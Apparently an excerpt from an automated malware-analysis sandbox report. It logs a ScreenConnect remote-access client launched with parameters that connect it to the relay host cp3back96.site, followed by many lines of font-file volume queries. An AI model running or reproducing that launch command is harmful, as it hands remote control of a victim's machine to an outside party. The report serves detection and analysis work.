              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\pbjp0lvb.vxd\ezccovkw.h6b\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\screenconnect.clientservice.exe" "?e=support&y=guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=bgiaaackaabsu0exaagaaaeaaqb9zmuocnsrac12buom5jb%2f0aqdwfmpukdawi13yrxom16w00nll4p0ztehanoxvmcw0wwfebnckj1h1sizr06d2epn5y1la%2fzuaunqxvb6zv6mkv%2fq3pq8o4ikeuzm%2b1utt6bvi8cjhvom7wlyyjcudqab6dwlh4jauc5yebvht8maznaiypqnbmxnwuw1rdlarh5yjbzgptjpijpusdeo4d%2fcutp6cz%2f6lbyci1k6apr4nfjdocsgymmz0uewapw6fnswepa0e3g6vxjqsjxuzxu7nn2pc9y84o5l0uqvktz239upnomzv8wnsyaubzull%2b48fuht%2fyi9uktbmorr&r=&i=untitled%20session" "1"
              Source: unknown Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\pbjp0lvb.vxd\ezccovkw.h6b\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\screenconnect.clientservice.exe" "?e=support&y=guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=bgiaaackaabsu0exaagaaaeaaqb9zmuocnsrac12buom5jb%2f0aqdwfmpukdawi13yrxom16w00nll4p0ztehanoxvmcw0wwfebnckj1h1sizr06d2epn5y1la%2fzuaunqxvb6zv6mkv%2fq3pq8o4ikeuzm%2b1utt6bvi8cjhvom7wlyyjcudqab6dwlh4jauc5yebvht8maznaiypqnbmxnwuw1rdlarh5yjbzgptjpijpusdeo4d%2fcutp6cz%2f6lbyci1k6apr4nfjdocsgymmz0uewapw6fnswepa0e3g6vxjqsjxuzxu7nn2pc9y84o5l0uqvktz239upnomzv8wnsyaubzull%2b48fuht%2fyi9uktbmorr&r=&i=untitled%20session" "1"
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr Binary or memory string: Progman
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userFR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userFI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userFB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userST.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userSTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userSTB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userSTBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
